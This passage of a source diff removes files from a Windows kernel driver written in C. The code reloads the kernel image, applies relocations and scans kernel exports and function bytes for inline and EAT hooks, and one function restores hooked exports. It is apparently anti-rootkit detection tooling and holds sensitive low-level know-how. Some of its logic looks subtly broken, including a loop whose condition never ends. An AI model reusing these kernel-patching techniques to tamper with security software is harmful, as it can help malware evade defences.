Temp = *(PUSHORT)FixupVA << 16;
Temp += (ULONG) Diff;
*(PUSHORT)FixupVA = (USHORT)(Temp >> 16);
break;
case IMAGE_REL_BASED_HIGHADJ :
//
// Adjust high - (16-bits) relocate the high half of an
// address and adjust for sign extension of low half.
//
//
// If the address has already been relocated then don't
// process it again now or information will be lost.
//
if (Offset & LDRP_RELOCATION_FINAL) {
++NextOffset;
--SizeOfBlock;
break;
}
Temp = *(PUSHORT)FixupVA << 16;
++NextOffset;
--SizeOfBlock;
Temp += (LONG)(*(PSHORT)NextOffset);
Temp += (ULONG) Diff;
Temp += 0x8000;
*(PUSHORT)FixupVA = (USHORT)(Temp >> 16);
break;
case IMAGE_REL_BASED_LOW :
//
// Low - (16-bit) relocate the low half of an address.
//
Temp = *(PSHORT)FixupVA;
Temp += (ULONG) Diff;
*(PUSHORT)FixupVA = (USHORT)Temp;
break;
case IMAGE_REL_BASED_IA64_IMM64:
//
// Align it to bundle address before fixing up the
// 64-bit immediate value of the movl instruction.
//
FixupVA = (PUCHAR)((ULONG_PTR)FixupVA & ~(15));
Value64 = (ULONGLONG)0;
//
// Extract the lower 32 bits of IMM64 from bundle
//
EXT_IMM64(Value64,
(PULONG)FixupVA + EMARCH_ENC_I17_IMM7B_INST_WORD_X,
EMARCH_ENC_I17_IMM7B_SIZE_X,
EMARCH_ENC_I17_IMM7B_INST_WORD_POS_X,
EMARCH_ENC_I17_IMM7B_VAL_POS_X);
EXT_IMM64(Value64,
(PULONG)FixupVA + EMARCH_ENC_I17_IMM9D_INST_WORD_X,
EMARCH_ENC_I17_IMM9D_SIZE_X,
EMARCH_ENC_I17_IMM9D_INST_WORD_POS_X,
EMARCH_ENC_I17_IMM9D_VAL_POS_X);
EXT_IMM64(Value64,
(PULONG)FixupVA + EMARCH_ENC_I17_IMM5C_INST_WORD_X,
EMARCH_ENC_I17_IMM5C_SIZE_X,
EMARCH_ENC_I17_IMM5C_INST_WORD_POS_X,
EMARCH_ENC_I17_IMM5C_VAL_POS_X);
EXT_IMM64(Value64,
(PULONG)FixupVA + EMARCH_ENC_I17_IC_INST_WORD_X,
EMARCH_ENC_I17_IC_SIZE_X,
EMARCH_ENC_I17_IC_INST_WORD_POS_X,
EMARCH_ENC_I17_IC_VAL_POS_X);
EXT_IMM64(Value64,
(PULONG)FixupVA + EMARCH_ENC_I17_IMM41a_INST_WORD_X,
EMARCH_ENC_I17_IMM41a_SIZE_X,
EMARCH_ENC_I17_IMM41a_INST_WORD_POS_X,
EMARCH_ENC_I17_IMM41a_VAL_POS_X);
EXT_IMM64(Value64,
((PULONG)FixupVA + EMARCH_ENC_I17_IMM41b_INST_WORD_X),
EMARCH_ENC_I17_IMM41b_SIZE_X,
EMARCH_ENC_I17_IMM41b_INST_WORD_POS_X,
EMARCH_ENC_I17_IMM41b_VAL_POS_X);
EXT_IMM64(Value64,
((PULONG)FixupVA + EMARCH_ENC_I17_IMM41c_INST_WORD_X),
EMARCH_ENC_I17_IMM41c_SIZE_X,
EMARCH_ENC_I17_IMM41c_INST_WORD_POS_X,
EMARCH_ENC_I17_IMM41c_VAL_POS_X);
EXT_IMM64(Value64,
((PULONG)FixupVA + EMARCH_ENC_I17_SIGN_INST_WORD_X),
EMARCH_ENC_I17_SIGN_SIZE_X,
EMARCH_ENC_I17_SIGN_INST_WORD_POS_X,
EMARCH_ENC_I17_SIGN_VAL_POS_X);
//
// Update 64-bit address
//
Value64+=Diff;
//
// Insert IMM64 into bundle
//
INS_IMM64(Value64,
((PULONG)FixupVA + EMARCH_ENC_I17_IMM7B_INST_WORD_X),
EMARCH_ENC_I17_IMM7B_SIZE_X,
EMARCH_ENC_I17_IMM7B_INST_WORD_POS_X,
EMARCH_ENC_I17_IMM7B_VAL_POS_X);
INS_IMM64(Value64,
((PULONG)FixupVA + EMARCH_ENC_I17_IMM9D_INST_WORD_X),
EMARCH_ENC_I17_IMM9D_SIZE_X,
EMARCH_ENC_I17_IMM9D_INST_WORD_POS_X,
EMARCH_ENC_I17_IMM9D_VAL_POS_X);
INS_IMM64(Value64,
((PULONG)FixupVA + EMARCH_ENC_I17_IMM5C_INST_WORD_X),
EMARCH_ENC_I17_IMM5C_SIZE_X,
EMARCH_ENC_I17_IMM5C_INST_WORD_POS_X,
EMARCH_ENC_I17_IMM5C_VAL_POS_X);
INS_IMM64(Value64,
((PULONG)FixupVA + EMARCH_ENC_I17_IC_INST_WORD_X),
EMARCH_ENC_I17_IC_SIZE_X,
EMARCH_ENC_I17_IC_INST_WORD_POS_X,
EMARCH_ENC_I17_IC_VAL_POS_X);
INS_IMM64(Value64,
((PULONG)FixupVA + EMARCH_ENC_I17_IMM41a_INST_WORD_X),
EMARCH_ENC_I17_IMM41a_SIZE_X,
EMARCH_ENC_I17_IMM41a_INST_WORD_POS_X,
EMARCH_ENC_I17_IMM41a_VAL_POS_X);
INS_IMM64(Value64,
((PULONG)FixupVA + EMARCH_ENC_I17_IMM41b_INST_WORD_X),
EMARCH_ENC_I17_IMM41b_SIZE_X,
EMARCH_ENC_I17_IMM41b_INST_WORD_POS_X,
EMARCH_ENC_I17_IMM41b_VAL_POS_X);
INS_IMM64(Value64,
((PULONG)FixupVA + EMARCH_ENC_I17_IMM41c_INST_WORD_X),
EMARCH_ENC_I17_IMM41c_SIZE_X,
EMARCH_ENC_I17_IMM41c_INST_WORD_POS_X,
EMARCH_ENC_I17_IMM41c_VAL_POS_X);
INS_IMM64(Value64,
((PULONG)FixupVA + EMARCH_ENC_I17_SIGN_INST_WORD_X),
EMARCH_ENC_I17_SIGN_SIZE_X,
EMARCH_ENC_I17_SIGN_INST_WORD_POS_X,
EMARCH_ENC_I17_SIGN_VAL_POS_X);
break;
case IMAGE_REL_BASED_DIR64:
*(ULONGLONG UNALIGNED *)FixupVA += Diff;
break;
case IMAGE_REL_BASED_MIPS_JMPADDR :
//
// JumpAddress - (32-bits) relocate a MIPS jump address.
//
Temp = (*(PULONG)FixupVA & 0x3ffffff) << 2;
Temp += (ULONG) Diff;
*(PULONG)FixupVA = (*(PULONG)FixupVA & ~0x3ffffff) |
((Temp >> 2) & 0x3ffffff);
break;
case IMAGE_REL_BASED_ABSOLUTE :
//
// Absolute - no fixup required.
//
break;
case IMAGE_REL_BASED_SECTION :
//
// Section Relative reloc. Ignore for now.
//
break;
case IMAGE_REL_BASED_REL32 :
//
// Relative intrasection. Ignore for now.
//
break;
default :
//
// Illegal - illegal relocation type.
//
return (PIMAGE_BASE_RELOCATION)NULL;
}
++NextOffset;
}
return (PIMAGE_BASE_RELOCATION)NextOffset;
}
/*
NtHeader
*/
NTSTATUS
NTAPI
RtlImageNtHeaderEx(
ULONG Flags,
PVOID Base,
ULONG64 Size,
OUT PIMAGE_NT_HEADERS * OutHeaders
)
{
PIMAGE_NT_HEADERS NtHeaders = 0;
ULONG e_lfanew = 0;
BOOLEAN RangeCheck = 0;
NTSTATUS Status = 0;
const ULONG ValidFlags =
RTL_IMAGE_NT_HEADER_EX_FLAG_NO_RANGE_CHECK;
if (OutHeaders != NULL) {
*OutHeaders = NULL;
}
if (OutHeaders == NULL) {
Status = STATUS_INVALID_PARAMETER;
goto Exit;
}
if ((Flags & ~ValidFlags) != 0) {
Status = STATUS_INVALID_PARAMETER;
goto Exit;
}
if (Base == NULL || Base == (PVOID)(LONG_PTR)-1) {
Status = STATUS_INVALID_PARAMETER;
goto Exit;
}
RangeCheck = ((Flags & RTL_IMAGE_NT_HEADER_EX_FLAG_NO_RANGE_CHECK) == 0);
if (RangeCheck) {
if (Size < sizeof(IMAGE_DOS_HEADER)) {
Status = STATUS_INVALID_IMAGE_FORMAT;
goto Exit;
}
}
//
// Exception handling is not available in the boot loader, and exceptions
// were not historically caught here in kernel mode. Drivers are considered
// trusted, so we can't get an exception here due to a bad file, but we
// could take an inpage error.
//
#define EXIT goto Exit
if (((PIMAGE_DOS_HEADER)Base)->e_magic != IMAGE_DOS_SIGNATURE) {
Status = STATUS_INVALID_IMAGE_FORMAT;
EXIT;
}
e_lfanew = ((PIMAGE_DOS_HEADER)Base)->e_lfanew;
if (RangeCheck) {
if (e_lfanew >= Size
#define SIZEOF_PE_SIGNATURE 4
|| e_lfanew >= (MAXULONG - SIZEOF_PE_SIGNATURE - sizeof(IMAGE_FILE_HEADER))
|| (e_lfanew + SIZEOF_PE_SIGNATURE + sizeof(IMAGE_FILE_HEADER)) >= Size
) {
Status = STATUS_INVALID_IMAGE_FORMAT;
EXIT;
}
}
NtHeaders = (PIMAGE_NT_HEADERS)((PCHAR)Base + e_lfanew);
//
// In kernelmode, do not cross from usermode address to kernelmode address.
//
if (Base < MM_HIGHEST_USER_ADDRESS) {
if ((PVOID)NtHeaders >= MM_HIGHEST_USER_ADDRESS) {
Status = STATUS_INVALID_IMAGE_FORMAT;
EXIT;
}
//
// Note that this check is slightly overeager since IMAGE_NT_HEADERS has
// a builtin array of data_directories that may be larger than the image
// actually has. A better check would be to add FileHeader.SizeOfOptionalHeader,
// after ensuring that the FileHeader does not cross the u/k boundary.
//
if ((PVOID)((PCHAR)NtHeaders + sizeof (IMAGE_NT_HEADERS)) >= MM_HIGHEST_USER_ADDRESS) {
Status = STATUS_INVALID_IMAGE_FORMAT;
EXIT;
}
}
if (NtHeaders->Signature != IMAGE_NT_SIGNATURE) {
Status = STATUS_INVALID_IMAGE_FORMAT;
EXIT;
}
Status = STATUS_SUCCESS;
Exit:
if (NT_SUCCESS(Status)) {
*OutHeaders = NtHeaders;
}
return Status;
}
//
// PIMAGE_NT_HEADERS
// NTAPI
// RtlImageNtHeader(
// PVOID Base
// )
// {
// PIMAGE_NT_HEADERS NtHeaders = NULL;
// (VOID)RtlImageNtHeaderEx(RTL_IMAGE_NT_HEADER_EX_FLAG_NO_RANGE_CHECK, Base, 0, &NtHeaders);
// return NtHeaders;
// }
//
//


@ -1,33 +0,0 @@
#include "Reload.h"
BOOLEAN
FixBaseRelocTable (
PVOID NewImageBase,
DWORD ExistImageBase
);
PIMAGE_BASE_RELOCATION
LdrProcessRelocationBlockLongLong(
IN ULONG_PTR VA,
IN ULONG SizeOfBlock,
IN PUSHORT NextOffset,
IN LONGLONG Diff
);
NTSTATUS
NTAPI
RtlImageNtHeaderEx(
ULONG Flags,
PVOID Base,
ULONG64 Size,
OUT PIMAGE_NT_HEADERS * OutHeaders
);
PIMAGE_NT_HEADERS
NTAPI
RtlImageNtHeader(
PVOID Base
);


@ -1,694 +0,0 @@
#include "KernelHookCheck.h"
#include "libdasm.h"
#include "Common.h"
#include "Reload.h"
ULONG IntHookCount; //记录Hook数量
extern DWORD OriginalKiServiceTable;
extern PSERVICE_DESCRIPTOR_TABLE OriginalServiceDescriptorTable;
extern ULONG_PTR SystemKernelModuleBase;
extern ULONG_PTR SystemKernelModuleSize;
extern ULONG_PTR ImageModuleBase;
BOOLEAN KernelHookCheck(PINLINEHOOKINFO InlineHookInfo)
{
NTSTATUS Status = STATUS_UNSUCCESSFUL;
PIMAGE_NT_HEADERS NtHeader;
PIMAGE_EXPORT_DIRECTORY ExportTable;
ULONG* FunctionAddresses;
ULONG* FunctionNames;
USHORT* FunctionIndexs;
ULONG ulIndex;
ULONG i;
CHAR* szFunctionName;
SIZE_T ViewSize=0;
ULONG_PTR ulFunctionAddress;
BOOL bIsZwFunction = FALSE;
ULONG ulOldAddress;
ULONG ulReloadAddress;
PUCHAR ulTemp;
__try{
NtHeader = RtlImageNtHeader((PVOID)ImageModuleBase);
if (NtHeader && NtHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress){
ExportTable =(IMAGE_EXPORT_DIRECTORY*)((ULONG_PTR)ImageModuleBase + NtHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
FunctionAddresses = (ULONG*)((ULONG_PTR)ImageModuleBase + ExportTable->AddressOfFunctions);
FunctionNames = (ULONG*)((ULONG_PTR)ImageModuleBase + ExportTable->AddressOfNames);
FunctionIndexs = (USHORT*)((ULONG_PTR)ImageModuleBase + ExportTable->AddressOfNameOrdinals);
for(i = 0; i < ExportTable->NumberOfNames; i++)
{
szFunctionName = (LPSTR)((ULONG_PTR)ImageModuleBase + FunctionNames[i]);
ulIndex = FunctionIndexs[i];
ulFunctionAddress = (ULONG_PTR)((ULONG_PTR)ImageModuleBase + FunctionAddresses[ulIndex]);
// ulIndex=*(ULONG*)(ulFunctionAddress+1); //32 bit 1 64 bit 4 //服务号
//对于非Zw系列函数 偏移到系统的该函数地址处
ulReloadAddress = ulFunctionAddress;
ulOldAddress = ulReloadAddress - (ULONG)ImageModuleBase + SystemKernelModuleBase;
if (!ulOldAddress ||
!MmIsAddressValid((PVOID)ulOldAddress) ||
!ulReloadAddress ||
!MmIsAddressValid((PVOID)ulReloadAddress))
{
continue;
}
bIsZwFunction = FALSE;
//检查下一层第一个call的函数的hook
if (*szFunctionName == 'Z' &&
*(szFunctionName+1) == 'w')
{
bIsZwFunction = TRUE;
ulIndex = *((WORD*)(ulFunctionAddress + 1)); //得到服务号
if (ulIndex > 0 &&
ulIndex <= OriginalServiceDescriptorTable->TableSize)
{
//对于Zw系列函数 获得系统Ntos中 对应的Nt函数的地址
ulReloadAddress = OriginalServiceDescriptorTable->ServiceTable[ulIndex];
ulOldAddress = ulReloadAddress - (ULONG)ImageModuleBase + SystemKernelModuleBase;
}
}
if (bIsZwFunction)
{
//如果 bIsZwFunction == TRUE 重新效验一下地址的有效性
if (!ulOldAddress ||
!MmIsAddressValid((PVOID)ulOldAddress) ||
!ulReloadAddress ||
!MmIsAddressValid((PVOID)ulReloadAddress))
{
continue;
}
}
else //下一层函数只扫描非Zw开头的并且只扫描未导出函数
{
GetNextFunctionAddress(ImageModuleBase,ulOldAddress,szFunctionName,InlineHookInfo);
}
ulTemp = NULL;
//对于Zw中的Nt函数 、 导出函数
//判断是否Ntos 导出表Hook
//ulOldAddress 是根据重载地址 - Base + KernelBase 真正函数的地址
ulTemp = (PUCHAR)GetEatHook(ulOldAddress,i,SystemKernelModuleBase,SystemKernelModuleSize); //比较EAT Hook
if(ulTemp)
{//导出表Hook了
FillInlineHookInfo(ulTemp,InlineHookInfo,szFunctionName,ulOldAddress,1); //EAT Hook 1
}
//是否是InlineHook
CheckFuncByOpcode((PVOID)ulReloadAddress,InlineHookInfo,szFunctionName,(PVOID)ulOldAddress);
}
}
}__except(EXCEPTION_EXECUTE_HANDLER)
{
}
return STATUS_SUCCESS;
}
VOID FillInlineHookInfo(PUCHAR ulTemp,PINLINEHOOKINFO InlineHookInfo,CHAR* szFunctionName,ULONG ulOldAddress,ULONG HookType)
{
ULONG ulHookModuleBase;
ULONG ulHookModuleSize;
char lpszHookModuleImage[256];
ULONG IntHookCount = InlineHookInfo->ulCount;
memset(lpszHookModuleImage,0,sizeof(lpszHookModuleImage));
if (!IsAddressInSystem(
(ULONG)ulTemp,
&ulHookModuleBase,
&ulHookModuleSize,
lpszHookModuleImage))
{
memset(lpszHookModuleImage,0,sizeof(lpszHookModuleImage));
strcat(lpszHookModuleImage,"Unknown4");
ulHookModuleBase = 0;
ulHookModuleSize = 0;
}
InlineHookInfo->InlineHook[IntHookCount].ulMemoryHookBase = (ULONG)ulTemp;
memset(InlineHookInfo->InlineHook[IntHookCount].lpszFunction,0,sizeof(InlineHookInfo->InlineHook[IntHookCount].lpszFunction));
memset(InlineHookInfo->InlineHook[IntHookCount].lpszHookModuleImage,0,sizeof(InlineHookInfo->InlineHook[IntHookCount].lpszHookModuleImage));
memcpy(InlineHookInfo->InlineHook[IntHookCount].lpszFunction,szFunctionName,strlen(szFunctionName));
memcpy(InlineHookInfo->InlineHook[IntHookCount].lpszHookModuleImage,lpszHookModuleImage,strlen(lpszHookModuleImage));
InlineHookInfo->InlineHook[IntHookCount].ulMemoryFunctionBase = (ULONG)ulOldAddress;
InlineHookInfo->InlineHook[IntHookCount].ulHookModuleBase = ulHookModuleBase;
InlineHookInfo->InlineHook[IntHookCount].ulHookModuleSize = ulHookModuleSize;
InlineHookInfo->InlineHook[IntHookCount].ulHookType = HookType; //eat hook 1 Inline Hook 0
IntHookCount++;
InlineHookInfo->ulCount++;
}
VOID CheckFuncByOpcode(PVOID ulReloadAddress,PINLINEHOOKINFO InlineHookInfo,CHAR* szFunctionName,PVOID ulOldAddress)
{
INSTRUCTION Inst;
INSTRUCTION Instb;
ULONG ulHookFunctionAddress;
size_t ulCodeSize;
PUCHAR p;
PUCHAR ulTemp;
int Flagss;
if (GetFunctionCodeSize(ulOldAddress) == GetFunctionCodeSize(ulReloadAddress) &&
memcmp(ulReloadAddress,ulOldAddress,GetFunctionCodeSize(ulOldAddress)) != 0)
{//被Hook了
//开始扫描hooksss
ulCodeSize = GetFunctionCodeSize(ulOldAddress);
for (p = (PUCHAR)ulOldAddress ;(ULONG)p < (ULONG)ulOldAddress+ulCodeSize; p++)
{
//折半扫描,如果前面一半一样,则开始扫描下一半
if (memcmp(ulReloadAddress,ulOldAddress,ulCodeSize/2) == 0)
{
ulCodeSize = ulCodeSize + ulCodeSize/2;
continue;
}
if (*p == 0xcc ||
*p == 0xc2)
{
break;
}
ulHookFunctionAddress = (*(PULONG)(p + 1) + (ULONG)p + 5); //得到hook的地址
if (!MmIsAddressValid((PVOID)ulHookFunctionAddress))
{
continue;
}
ulTemp = NULL;
get_instruction(&Inst,p,MODE_32);
switch (Inst.type)
{
case INSTRUCTION_TYPE_JMP:
if(Inst.opcode==0xFF&&Inst.modrm==0x25)
{
//DIRECT_JMP
ulTemp = (PUCHAR)Inst.op1.displacement;
}
else if (Inst.opcode==0xEB)
{
ulTemp = (PUCHAR)(p+Inst.op1.immediate);
}
else if(Inst.opcode==0xE9)
{
//RELATIVE_JMP;
ulTemp = (PUCHAR)(p+Inst.op1.immediate);
}
break;
case INSTRUCTION_TYPE_CALL:
if(Inst.opcode==0xFF&&Inst.modrm==0x15)
{
//DIRECT_CALL
ulTemp = (PUCHAR)Inst.op1.displacement;
}
else if (Inst.opcode==0x9A)
{
ulTemp = (PUCHAR)(p+Inst.op1.immediate);
}
else if(Inst.opcode==0xE8)
{
//RELATIVE_CALL;
ulTemp = (PUCHAR)(p+Inst.op1.immediate);
}
break;
case INSTRUCTION_TYPE_PUSH:
if(!RMmIsAddressValid((PVOID)(p)))
{
break;
}
get_instruction(&Instb,(BYTE*)(p),MODE_32);
if(Instb.type == INSTRUCTION_TYPE_RET)
{
//StartAddress+len-inst.length-instb.length;
ulTemp = (PUCHAR)Instb.op1.displacement;
}
break;
}
if (ulTemp &&
RMmIsAddressValid(ulTemp) &&
RMmIsAddressValid(p)) //hook的地址也要有效才可以哦
{
if ((ULONG)ulTemp > SystemKernelModuleBase &&
(ULONG)ulTemp < SystemKernelModuleBase+SystemKernelModuleSize) //太近的跳也不是
{
goto Next;
}
//ulTemp也不能小于 SystemKernelModuleBase
if ((ULONG)ulTemp < SystemKernelModuleBase)
{
goto Next;
}
//KdPrint(("%08x-%08x-%08x",p,ulTemp,(SystemKernelModuleBase + SystemKernelModuleSize + 0xfffffff)));
if (*(ULONG *)ulTemp == 0x00000000 ||
*(ULONG *)ulTemp == 0x00000005 ||
*(ULONG *)ulTemp == 0xc0000012)
{
goto Next;
}
Flagss = 0;
__asm{
mov esi,ulTemp
mov ax,word ptr [esi]
cmp ax,0x0000
jz Cont//是add byte ptr [eax],al
//结束
mov Flagss,1
Cont:
}
if (Flagss != 1)
goto Next;
ulTemp = ulTemp+0x5;
//简单处理一下二级跳
if (*ulTemp == 0xe9 ||
*ulTemp == 0xe8)
{
ulTemp = (PUCHAR)(*(PULONG)(ulTemp+1)+(ULONG)(ulTemp+5));
}
FillInlineHookInfo(ulTemp,InlineHookInfo,szFunctionName,(ULONG)p,0); //Inline Hook
Next:
_asm{nop}
}
}
}
}
//获取导出函数下一级0xe8 call函数的inlinehookcheck
ULONG GetNextFunctionAddress(ULONG ulNtDllModuleBase,ULONG ulOldAddress,char *functionName,PINLINEHOOKINFO InlineHookInfo)
{
ULONG ulCodeSize;
ULONG ulNextFunCodeSize;
ULONG ulNextFunReloadCodeSize;
PUCHAR i;
PUCHAR ulNextFunctionAddress = NULL;
PUCHAR ulReloadNextFunctionAddress = NULL;
BOOL bRetOK = FALSE;
PUCHAR ulTemp;
ULONG ulHookFunctionAddress;
PUCHAR p;
INSTRUCTION Inst;
INSTRUCTION Instb;
char lpszHookModuleImage[256];
ULONG ulHookModuleBase;
ULONG ulHookModuleSize;
int Flagss;
if (!MmIsAddressValid((PVOID)ulOldAddress))
{
return bRetOK;
}
__try
{
ulCodeSize = GetFunctionCodeSize((PVOID)ulOldAddress);
for (i=(PUCHAR)ulOldAddress;i < i+ulCodeSize;i++)
{
//扫描二次跳转
if (*i == 0xe8)
{
ulNextFunctionAddress = (PUCHAR)(*(PULONG)(i+1)+(ULONG)(i+5));
if (MmIsAddressValid((PVOID)ulNextFunctionAddress))
{
//判断一下是否是导出函数
if (IsFunctionInExportTable(ulNtDllModuleBase,(ULONG)ulNextFunctionAddress))
{
return 0;
}
//做hook 扫描
ulReloadNextFunctionAddress = ulNextFunctionAddress - SystemKernelModuleBase + ImageModuleBase;
if (MmIsAddressValid(ulReloadNextFunctionAddress) &&
MmIsAddressValid(ulNextFunctionAddress))
{
ulNextFunCodeSize = GetFunctionCodeSize(ulNextFunctionAddress);
ulNextFunReloadCodeSize = GetFunctionCodeSize(ulReloadNextFunctionAddress);
if (ulNextFunCodeSize == ulNextFunReloadCodeSize &&
memcmp(ulReloadNextFunctionAddress,ulNextFunctionAddress,ulNextFunCodeSize) != 0)
{
//被hook了
for (p = (PUCHAR)ulNextFunctionAddress ;(ULONG)p < (ULONG)ulNextFunctionAddress+ulNextFunCodeSize; p++)
{
//折半扫描,如果前面一半一样,则开始扫描下一半
if (memcmp(ulReloadNextFunctionAddress, ulNextFunctionAddress,ulNextFunCodeSize/2) == 0)
{
ulNextFunCodeSize = ulNextFunCodeSize + ulNextFunCodeSize/2;
continue;
}
//是否结束?
if (*p == 0xcc ||
*p == 0xc2)
{
break;
}
ulHookFunctionAddress = (*(PULONG)(p + 1) + (ULONG)p + 5); //得到地址
if (!RMmIsAddressValid((PVOID)ulHookFunctionAddress))
{
continue;
}
ulTemp = NULL;
get_instruction(&Inst,p,MODE_32);
switch (Inst.type)
{
case INSTRUCTION_TYPE_JMP:
if(Inst.opcode==0xFF&&Inst.modrm==0x25)
{
//DIRECT_JMP
ulTemp = (PUCHAR)Inst.op1.displacement;
}
else if (Inst.opcode==0xEB)
{
ulTemp = (PUCHAR)(p+Inst.op1.immediate);
}
else if(Inst.opcode==0xE9)
{
//RELATIVE_JMP;
ulTemp = (PUCHAR)(p+Inst.op1.immediate);
}
break;
case INSTRUCTION_TYPE_CALL:
if(Inst.opcode==0xFF&&Inst.modrm==0x15)
{
//DIRECT_CALL
ulTemp = (PUCHAR)Inst.op1.displacement;
}
else if (Inst.opcode==0x9A)
{
ulTemp = (PUCHAR)(p+Inst.op1.immediate);
}
else if(Inst.opcode==0xE8)
{
//RELATIVE_CALL;
ulTemp = (PUCHAR)(p+Inst.op1.immediate);
}
break;
case INSTRUCTION_TYPE_PUSH:
if(!RMmIsAddressValid((PVOID)(p)))
{
break;
}
get_instruction(&Instb,(BYTE*)(p),MODE_32);
if(Instb.type == INSTRUCTION_TYPE_RET)
{
//StartAddress+len-inst.length-instb.length;
ulTemp = (PUCHAR)Instb.op1.displacement;
}
break;
}
if (ulTemp &&
MmIsAddressValid(ulTemp) &&
MmIsAddressValid(p)) //hook的地址也要有效才可以哦
{
if ((ULONG)ulTemp > SystemKernelModuleBase &&
(ULONG)ulTemp < SystemKernelModuleBase+SystemKernelModuleSize) //太近的跳也不是
{
goto Next;
}
//ulTemp也不能小于 SystemKernelModuleBase
if ((ULONG)ulTemp < SystemKernelModuleBase)
{
goto Next;
}
if (*(ULONG *)ulTemp == 0x00000000 ||
*(ULONG *)ulTemp == 0x00000005)
{
goto Next;
}
Flagss = 0;
__asm{
mov esi,ulTemp
mov ax,word ptr [esi]
cmp ax,0x0000
jz Cont//是add byte ptr [eax],al
mov Flagss,1
Cont:
}
if (Flagss != 1)
goto Next;
ulTemp = ulTemp+0x5;
//简单处理一下二级跳
if (*ulTemp == 0xe9 ||
*ulTemp == 0xe8)
{
ulTemp = (PUCHAR)(*(PULONG)(ulTemp+1)+(ULONG)(ulTemp+5));
}
FillInlineHookInfo(ulTemp+0x5,InlineHookInfo,functionName,(ULONG)p,2);
Next:
_asm{nop}
}
}
}
}
}
}
//结束鸟
if (*i == 0xcc ||
*i == 0xc2)
{
return 0;
}
}
}__except(EXCEPTION_EXECUTE_HANDLER){
}
return 0;
}
BOOLEAN IsFunctionInExportTable(ULONG ulModuleBase,ULONG ulFunctionAddress)
{
PIMAGE_DOS_HEADER pDosHeader;
PIMAGE_NT_HEADERS NtDllHeader;
IMAGE_OPTIONAL_HEADER opthdr;
DWORD* arrayOfFunctionAddresses;
DWORD* arrayOfFunctionNames;
WORD* arrayOfFunctionOrdinals;
DWORD functionOrdinal;
DWORD Base, x, functionAddress,ulOldAddress;
IMAGE_EXPORT_DIRECTORY *pExportTable;
char *functionName;
__try
{
pDosHeader=(PIMAGE_DOS_HEADER)ulModuleBase;
if (pDosHeader->e_magic!=IMAGE_DOS_SIGNATURE)
{
KdPrint(("failed to find NtHeader\r\n"));
return FALSE;
}
NtDllHeader=(PIMAGE_NT_HEADERS)(ULONG)((ULONG)pDosHeader+pDosHeader->e_lfanew);
if (NtDllHeader->Signature!=IMAGE_NT_SIGNATURE)
{
KdPrint(("failed to find NtHeader\r\n"));
return FALSE;
}
opthdr = NtDllHeader->OptionalHeader;
pExportTable =(IMAGE_EXPORT_DIRECTORY*)((BYTE*)ulModuleBase + opthdr.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT]. VirtualAddress); //得到导出表
arrayOfFunctionAddresses = (DWORD*)( (BYTE*)ulModuleBase + pExportTable->AddressOfFunctions); //地址表
arrayOfFunctionNames = (DWORD*)((BYTE*)ulModuleBase + pExportTable->AddressOfNames); //函数名表
arrayOfFunctionOrdinals = (WORD*)( (BYTE*)ulModuleBase + pExportTable->AddressOfNameOrdinals);
Base = pExportTable->Base;
for(x = 0; x < pExportTable->NumberOfFunctions; x++) //在整个导出表里扫描
{
//functionName = (char*)((BYTE*)ulModuleBase + arrayOfFunctionNames[x]);
functionOrdinal = arrayOfFunctionOrdinals[x] + Base - 1;
functionAddress = (DWORD)((BYTE*)ulModuleBase + arrayOfFunctionAddresses[functionOrdinal]);
//KdPrint(("%08x:%s\r\n",functionAddress,functionName));
//ulOldAddress = GetSystemRoutineAddress(0,functionName);
ulOldAddress = functionAddress - ulModuleBase + SystemKernelModuleBase;
if (ulFunctionAddress == ulOldAddress)
{
//是导出函数,退出
return TRUE;
}
}
}__except(EXCEPTION_EXECUTE_HANDLER){
}
return FALSE;
}
BOOLEAN ReSetEatHook(CHAR *lpszFunction,ULONG ulReloadKernelModule,ULONG ulKernelModule)
{
ULONG ulModuleBase;
PIMAGE_DOS_HEADER pDosHeader;
PIMAGE_NT_HEADERS NtDllHeader;
IMAGE_OPTIONAL_HEADER opthdr;
DWORD* arrayOfFunctionAddresses;
DWORD* arrayOfFunctionNames;
WORD* arrayOfFunctionOrdinals;
DWORD functionOrdinal;
DWORD Base,x,functionAddress;
IMAGE_EXPORT_DIRECTORY *pExportTable;
char *functionName = NULL;
BOOL bIsEatHooked = FALSE;
int position;
ULONG ulFunctionOrdinal;
//恢复的时候 用reload的ImageModuleBase
ulModuleBase = ulReloadKernelModule;
pDosHeader = (PIMAGE_DOS_HEADER)ulModuleBase;
if (pDosHeader->e_magic!=IMAGE_DOS_SIGNATURE)
{
KdPrint(("failed to find NtHeader\r\n"));
return 0;
}
NtDllHeader=(PIMAGE_NT_HEADERS)(ULONG)((ULONG)pDosHeader+pDosHeader->e_lfanew);
if (NtDllHeader->Signature!=IMAGE_NT_SIGNATURE)
{
KdPrint(("failed to find NtHeader\r\n"));
return 0;
}
opthdr = NtDllHeader->OptionalHeader;
pExportTable =(IMAGE_EXPORT_DIRECTORY*)((BYTE*)ulModuleBase + opthdr.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT]. VirtualAddress); //得到导出表
arrayOfFunctionAddresses = (DWORD*)( (BYTE*)ulModuleBase + pExportTable->AddressOfFunctions); //地址表
arrayOfFunctionNames = (DWORD*)((BYTE*)ulModuleBase + pExportTable->AddressOfNames); //函数名表
arrayOfFunctionOrdinals = (WORD*)( (BYTE*)ulModuleBase + pExportTable->AddressOfNameOrdinals);
Base = pExportTable->Base;
for(x = 0; x < pExportTable->NumberOfFunctions; x++) //在整个导出表里扫描
{
functionName = (char*)((BYTE*)ulModuleBase + arrayOfFunctionNames[x]);
ulFunctionOrdinal = arrayOfFunctionOrdinals[x] + Base - 1;
ulFunctionOrdinal = arrayOfFunctionAddresses[ulFunctionOrdinal];
functionAddress = (DWORD)((BYTE*)ulModuleBase + ulFunctionOrdinal);
if (_stricmp(lpszFunction,functionName) == 0)
{
KdPrint(("reload ulFunctionOrdinal:%08x:%s",ulFunctionOrdinal,functionName));
//开始恢复
ulModuleBase = ulKernelModule;
pDosHeader = (PIMAGE_DOS_HEADER)ulModuleBase;
if (pDosHeader->e_magic!=IMAGE_DOS_SIGNATURE)
{
KdPrint(("failed to find NtHeader\r\n"));
return 0;
}
NtDllHeader=(PIMAGE_NT_HEADERS)(ULONG)((ULONG)pDosHeader+pDosHeader->e_lfanew);
if (NtDllHeader->Signature!=IMAGE_NT_SIGNATURE)
{
KdPrint(("failed to find NtHeader\r\n"));
return 0;
}
